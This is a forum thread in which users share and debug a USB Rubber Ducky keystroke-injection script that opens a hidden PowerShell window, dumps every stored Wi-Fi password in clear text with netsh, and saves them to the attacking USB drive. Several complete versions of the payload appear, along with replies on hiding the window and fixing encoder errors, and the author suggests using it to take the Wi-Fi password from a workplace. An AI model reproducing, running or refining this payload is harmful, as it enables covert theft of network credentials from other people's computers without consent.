BrainEater Posted March 17, 2017 Share Posted March 17, 2017 So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text files. So fair I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to usb within seconds, to grab and go. I just need help with one thing... How to hide the powershell window and is there anyway of making this script better (I already know i can use powershell to sent txt files to servers or through email i just think its easier with such a simple script to dump it straight back to usb)? Here is the Script Quote REM Name: Windows 10 Powershell WIFI Passwords Grabber REM Auther: Braineater, Mad Props To Darren Kitchen For Volume Finder Script DELAY 2000 GUI R DELAY 200 STRING powershell ENTER DELAY 200 STRING $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name ENTER DELAY 100 STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords.txt ENTER DELAY 100 STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
miloud33000 Posted March 17, 2017 Share Posted March 17, 2017 You can use powershell -WindowStyle hidden if you want it to be hidden :) Quote Link to comment Share on other sites More sharing options...
BrainEater Posted March 18, 2017 Author Share Posted March 18, 2017 I'll try that thanks. But can you still interact with the window when it is hidden, ie hid attack? Quote Link to comment Share on other sites More sharing options...
Thecolorchanges Posted March 18, 2017 Share Posted March 18, 2017 Yep! It just hides the window :) Quote Link to comment Share on other sites More sharing options...
BrainEater Posted March 18, 2017 Author Share Posted March 18, 2017 Thanks for the help. This is the final product that i have come up with and I'm super happy with it for my first script and Imy first go at powershell. I know there would be a way to shorten the powershell down, so if anyone comes up with anything please post it below. I also added a generated date stamp to the output txt file so you can save multiplet computers and days worth of extracted files. eg mate forgets his wifi password to give to you and you want the wifi password from work you can plug it in and save both automatically. Quote REM Name: Windows 10 Powershell WIFI Passwords Grabber REM Auther: Braineater REM Mad Props: Darren Kitchen for Volume Finder DELAY 2000 GUI R DELAY 200 STRING powershell -WindowStyle hidden ENTER DELAY 200 STRING $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name ENTER DELAY 100 STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords$(get-date -f yyyy-MM-dd).txt ENTER DELAY 100 STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
illwill Posted March 21, 2017 Share Posted March 21, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
BrainEater Posted March 21, 2017 Author Share Posted March 21, 2017 Awesome thanks for the heads up I'll give it ago. I'm assuming that if it works on window 7 it's forwards and maybe backwards compatible? Not many changes have been made to powershell from what I can tell. I'll have to read up on Windows 7 powershell too. Thanksfor the tip. Quote Link to comment Share on other sites More sharing options...
illwill Posted March 21, 2017 Share Posted March 21, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
index Posted April 2, 2017 Share Posted April 2, 2017 when i try your script i got some error with this line $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name the error says cd : Cannot process argument because the value of argument "path" is null. Change the value of argument "path" to a non-null value. At line:1 char:53 + $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name + ~~~~~~~~~~ + CategoryInfo : InvalidArgument: (:) [Set-Location], PSArgumentNullException + FullyQualifiedErrorId : ArgumentNull,Microsoft.PowerShell.Commands.SetLocationCommand i don't know what's wrong.. i'm running win10pro, but the path got me error... can you tell me what's wrong? Quote Link to comment Share on other sites More sharing options...
BrainEater Posted April 2, 2017 Author Share Posted April 2, 2017 (edited) I can certainly try @index Can I ask the name of the usb flash drive that you used (ie the name you have given to the drive) or what you named the mass storage of the twin duck that you used? This code has to be used with the rubber ducky flash with the twin duck firmware or the standard duck (or arduino) with a second usb drive plugged in as well (as it needs somewhere to store the output file) . The way I have written the code (stolen it from Darren) the usb or duck has to be named @ (just simply the at sign "@" and nothing else). You can of course change this just by changing the @ symbol in the code. ie $u=gwmi Win32_Volume|?{$_.Label -eq'your drive name here'}|select name;cd $u.name It seems that the code powershell is throwing after running the command, that it can not find the drive name specified. Hopefully this helps and if not let me know and I can look into it more (currently not in front of my computer). Edited April 2, 2017 by BrainEater Quote Link to comment Share on other sites More sharing options...
index Posted April 2, 2017 Share Posted April 2, 2017 ohh yea. thanks. i'm just new with this syntax shell thing... i'm sorry. so i fixed it but nothing saved. when i debugging what just happen with some delay, i notice something change with the command in powershell ducky type this code: $u=gwmi Win32_Volume|?{$_.Label -eq'anjing'}|select name;cd $u.name PS D:\> (netsh wlan show profiles) | Select-String @\:(.+)$@ | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=@$name@ key=clear)} | Select-String @Key Content\W+\:(.+)$@ | %{$pass=$_.Matches.Groups[1].Valu e.Trim(); $_} | %{[PSCustomObject]"{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords$(get-da te -f yyyy-MM-dd).txt notice this quotation mark should be written with @ rigth? > %{[PSCustomObject]"{ PROFILE_NAME=$name;PASSWORD=$pass }} i think something is wrong when i encode your script with ducktoolkit... how can i fix this? Quote Link to comment Share on other sites More sharing options...
index Posted April 2, 2017 Share Posted April 2, 2017 ok so i found the answer. i'm so sorry that i post a new post, i don't know why i can't edit my posted above. i don't know it's my laptop error or my usbducky error, because it seems that my laptop read "quotation mark" as @ symbol and @ symbol as "quotation mark" when my ducky write into the powershell.... i have to replace @ with "quotation mark" and same with "quotation mark" i replace it with @ and re-encode it again then my problem is solved. do you ever experience this kind of error? Quote Link to comment Share on other sites More sharing options...
BrainEater Posted April 2, 2017 Author Share Posted April 2, 2017 That's fine mate and don't be sorry I'm happy to help when I can I'm only new to all this as well. So the issue your having is really simple and it's not your computer or the script. If you are using the duck encoder on the website duckytoolbox it's an issue with the encoder. I have had the exact same problem when encoding anything more then a simple script. The easy fix is just to download the Java script encode (or the whole duck toolkit)from Darren's github page and encode it on your computer with that. It's upto date and from what I believe te website is no longer maintain. Quote Link to comment Share on other sites More sharing options...
index Posted April 2, 2017 Share Posted April 2, 2017 @BrainEater yea! you were right. no more error after i manually encode the script with duck toolkit from Darren's github.. thank you for the explanation, cheers! Quote Link to comment Share on other sites More sharing options...
BrainEater Posted April 2, 2017 Author Share Posted April 2, 2017 (edited) @illwill WhIle I'm here I will thank you for your input, it's interesting to see how powershell has change over the year but at the core it's still the same today as it was when it first come out. They have just added a few little commands to make life easier. Your adjustments work great and worked on every version of powershell. I'll give you some mad props in my REM and from now on try to code at the most basic level of powershell because its upwards compatible. Edited April 2, 2017 by BrainEater Quote Link to comment Share on other sites More sharing options...
Vic Posted July 24, 2021 Share Posted July 24, 2021 Is there a way to modify this script for a malduino w i know there is a converter in malduino w just never tried it yet Quote Link to comment Share on other sites More sharing options...
chrizree Posted July 24, 2021 Share Posted July 24, 2021 Try it then. This is about the USB Rubber Ducky, not the Malduino W Quote Link to comment Share on other sites More sharing options...
picoeater Posted January 9, 2023 Share Posted January 9, 2023 I always get a error when i use it i changed the path but always get the path null error. My path is H CODE: REM usb rubber ducky wifi password exfiltrator REM created by : C0SM0 REM let the computer recognize the twinduck DELAY 1000 REM open powershell via runbox GUI r DELAY 200 STRING powershell ENTER DELAY 300 REM cd into twinduck labled "H" STRING $u=gwmi Win32_Volume|?{$_.Label -eq'H'}|select name;cd $u.name ENTER DELAY 100 REM exfiltate wifi passwords to a file REM file named after the computer name STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$env:UserName".txt"; exit ENTER Quote Link to comment Share on other sites More sharing options...
picoeater Posted January 10, 2023 Share Posted January 10, 2023 20 hours ago, picoeater said: Fixt it Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.